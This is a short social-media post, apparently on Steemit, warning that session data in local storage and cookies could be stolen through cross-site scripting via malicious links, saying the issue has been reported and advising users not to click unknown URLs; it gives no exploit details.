This bug could affect all users on Steemit!

Why?

Steemit uses your local storage and cookies to save your session. No additional security has been provided. 

How?

Any malicious URL pasted here could lead to session hijacking when reading your local storage and cookie contents. This is also known as XSS attacks.  You'll never notice it happened, but the consequenses could be severe and resulting in a hijacked account.

How can i test this?

I wont reveal to much information in this post to prevent intentional XSS attacking. However, if you have a basic knowledge on Javascript, you'll be able to replicate the issue on your local machine.

If your knowledge on Javascript is zero, then do some google searching on XSS attacks.

OMG! Did you report this already?

The issue has been reported, along with a fix proposal to prevent this from happening.

Now what? Is my account in danger?

Your account is safe as long as you play by the rules of internet.

Please, don't ever - for real! - click on a URL without knowing where it will lead you.

XSS hijacking is only one of many evil things that could happen to you when clicking random links.